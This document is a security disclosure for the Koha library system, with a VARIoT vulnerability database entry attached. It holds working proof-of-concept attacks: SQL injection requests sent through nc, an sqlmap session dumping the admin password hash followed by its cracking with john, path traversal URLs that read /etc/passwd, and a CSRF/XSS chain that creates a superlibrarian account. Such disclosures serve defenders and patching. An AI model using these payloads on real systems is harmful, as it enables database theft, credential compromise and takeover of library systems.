root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass    root@kali:/home/wicked# john ./admin-pass     Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])    admin            (?)    guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate    Use the "--show" option to display all of the cracked passwords reliably

root@kali:/home/wicked# john ./admin-pass --show    ?:admin

1 password hash cracked, 0 left

  1. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

##################################################################################################

PoC:

##################################################################################################

==================================================================== 1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil') ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=&password=&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

==================================================================== 2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b ====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=&password=&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

##################################################################################################

PoC End

##################################################################################################

================================= 3. Path Traversal (CVE-2015-4633) =================================

Vulnerability

The "template_path" parameter in /cgi-bin/koha/svc/virtualshelves/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408

##################################################################################################

PoC:

##################################################################################################

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

##################################################################################################

PoC End

##################################################################################################

================================= 4. The site also lacks challenge tokens that prevent cross-site request forgery (XSRF) attacks.

The attack can be performed:

  • through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
  • through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected by stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl /cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected by reflected XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display") /cgi-bin/koha/opac-search.pl (parameters: "tag") /cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")  /cgi-bin/koha/acqui/lateorders.pl (parameters: "delay") /cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield") /cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield") /cgi-bin/koha/catalogue/search.pl (parameters: "limit") /cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter")  /cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode", "suggesteddate_from", "suggesteddate_to")

Impact

The vulnerabilities allow remote attackers to inject arbitrary web script or HTML in order to:

  • escalate privileges by targeting staff members with XSRF 
  • target users via browser exploits
  • target the webserver by combining with other server-side vulnerabilities.  

References

http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423 http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

##################################################################################################

PoC / Attack Scenario:

##################################################################################################

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http:///cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http:///cgi-bin/koha/virtualshelves/shelves.pl

the malicious code gets executed. The code can then perform any unauthorized action with the permissions of user Bob. For example:

Create new user:

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibrarian permission:

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log in as superlibrarian.

Side Note: For the attack to work, Alice needs to be logged in to the Open Public Catalog interface at the time of clicking the malicious link. Alice also needs access to the OPAC interface and permission to create public lists.

##################################################################################################

PoC / Attack Scenario End

##################################################################################################



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0026",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "library software community koha",
        "scope": null,
        "trust": 3.0,
        "vendor": "koha",
        "version": null
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.20.01"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.18.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.x"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.16.12"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.16"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.14.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.x"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "koha",
        "version": "3.18.08"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.05"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.06"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.04"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.01"
      },
      {
        "model": "koha",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "koha",
        "version": "3.14.02"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.7"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.11"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.20.1"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.18.8"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.16.12"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:koha:koha",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Raschin Ghanad-Tavakoli",
    "sources": [
      {
        "db": "BID",
        "id": "75426"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2015-4633",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2015-4633",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05198",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05201",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05199",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2015-05200",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2015-05197",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2015-4633",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.8,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2015-4633",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2015-4633",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05198",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05201",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05199",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05200",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2015-05197",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201512-698",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-05198"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05201"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05199"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05200"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2015-05197"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-008221"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-698"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-4633"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple SQL injection vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow (1) remote attackers to execute arbitrary SQL commands via the number parameter to opac-tags_subject.pl in the OPAC interface or (2) remote authenticated users to execute arbitrary SQL commands via the Filter or (3) Criteria parameter to reports/borrowers_out.pl in the Staff interface. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is the first open source library automation system. Koha is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. Multiple directory-traversal vulnerabilities\n3. Multiple HTML Injection vulnerabilities\n4. Multiple cross-site scripting vulnerabilities\n5. Multiple cross site request forgery vulnerabilities\nAn attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files,allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user and to perform unauthorized actions in the context of a logged-in user of the affected application.This may aid in further attacks. 
===============================================================================================\nSBA Research Vulnerability Disclosure\u00a0\n===============================================================================================\n\ntitle: \t\t\t        Koha Unauthenticated SQL injection\nproduct: \t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Koha ILS\naffected version:\t3.20.x \u003c= 3.20.1, 3.18.x \u003c= 3.18.8, 3.16.x \u003c= 3.16.12\nfixed version:\t\t3.20.1, 3.17.8, 3.16.12\nCVE numbers:\tCVE-2015-4633, CVE-2015-4632, CVE-2015-4631\nimpact:\t\t\tcritical\nwebsite:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://www.koha-community.org/\n\nfound by:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Raschin Tavakoli / SBA Research Combinatorial Security Testing Group\ncontact:\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0cst@sba-research.org\n\n\nReferences:\t\thttp://koha-community.org/security-release-koha-3-20-1/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-18-8/\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://koha-community.org/security-release-koha-3-16-12/\n\n\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418\n\t\t\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u200bhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423\n\n===========================================================================================
====\n\n=========================\n1. If the webserver is misconfigured, the file-system may be accessed as well. \n\nReferences:\n-----------\nhttp://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412\n\n\n# ################################################################################################## #\n# PoC: \t\t\t\t\t\t\t\t\t\t\t\t \u00a0 \u00a0 #\n# ################################################################################################## #\n1. Inspect Koha database schema\n\n\u00a0 \u00a0Have a look at how to query the database for superlibrarian users:\n\u00a0 \u00a0http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians\n\n\u00a0 \u00a0So basically we we need to execute some SQL statement like this:\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\n2. Query the database with sqlmap\n\n\u00a0 \u00a0So let\u0027s fire up sqlmap with the --sql-shell parameter and input the query:\n\n\u00a0 \u00a0root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0_\n\u00a0 \u00a0 ___ ___| |_____ ___ ___ \u00a0{1.0-dev-nongit-20150513}\n\u00a0 \u00a0|_ -| . | | \u00a0 \u00a0 | .\u0027| . |\n\u00a0 \u00a0|___|_ \u00a0|_|_|_|_|__,| \u00a0_|\n\u00a0 \u00a0 \u00a0 \u00a0 \u00a0|_| \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |_| \u00a0 http://sqlmap.org\n\n\n\u00a0 \u00a0[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user\u0027s responsibility to obey all applicable local, state and federal laws. 
Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n\n\u00a0 \u00a0[*] starting at 09:20:07\n\n\n\u00a0 \u00a0[09:20:07] [INFO] testing connection to the target URL\n\u00a0 \u00a0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:\n\u00a0 \u00a0---\n\u00a0 \u00a0Parameter: number (GET)\n\u00a0 \u00a0 \u00a0 \u00a0Type: AND/OR time-based blind\n\u00a0 \u00a0 \u00a0 \u00a0Title: MySQL \u003e= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)\n\u00a0 \u00a0 \u00a0 \u00a0Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)\n\u00a0 \u00a0---\n\u00a0 \u00a0[09:20:09] [INFO] testing MySQL\n\u00a0 \u00a0[09:20:09] [INFO] confirming MySQL\n\u00a0 \u00a0[09:20:09] [INFO] the back-end DBMS is MySQL\n\u00a0 \u00a0web server operating system: Linux Debian\n\u00a0 \u00a0web application technology: Apache 2.4.10\n\u00a0 \u00a0back-end DBMS: MySQL \u003e= 5.0.0\n\u00a0 \u00a0[09:20:09] [INFO] calling MySQL shell. To quit type \u0027x\u0027 or \u0027q\u0027 and press ENTER\n\n\n\u00a0 \u00a0sql-shell\u003e select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;\n\u00a0 \u00a0[09:20:25] [INFO] fetching SQL SELECT statement query output: \u0027select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1\u0027\n\u00a0 \u00a0[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind\n\u00a0 \u00a0[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait.............................. 
\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\n\u00a0 \u00a0[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors\u00a0\n\u00a0 \u00a0admin\n\u00a0 \u00a0[09:21:46] [INFO] retrieved: $2a$08$taQ\n\u00a0 \u00a0[09:23:33] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:23:33] [WARNING] increasing time delay to 5 seconds\u00a0\n\u00a0 \u00a0afOgEEhU\n\u00a0 \u00a0[09:25:10] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:25:10] [WARNING] increasing time delay to 6 seconds\u00a0\n\u00a0 \u00a0t/gW\n\u00a0 \u00a0[09:26:13] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:26:13] [WARNING] increasing time delay to 7 seconds\u00a0\n\u00a0 \u00a0TOmqnYe1Y6ZNxCENa\n\u00a0 \u00a0[09:29:57] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:29:57] [WARNING] increasing time delay to 8 seconds\u00a0\n\u00a0 \u00a02.ONk2eZhnuEw5z9OjjxS\n\u00a0 \u00a0[09:35:08] [ERROR] invalid character detected. retrying.. \n\u00a0 \u00a0[09:35:08] [WARNING] increasing time delay to 9 seconds\u00a0\n\n\u00a0 \u00a0select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;: \u00a0 \u00a0\n\u00a0 \u00a0\u0027admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS\u0027\n\n3. 
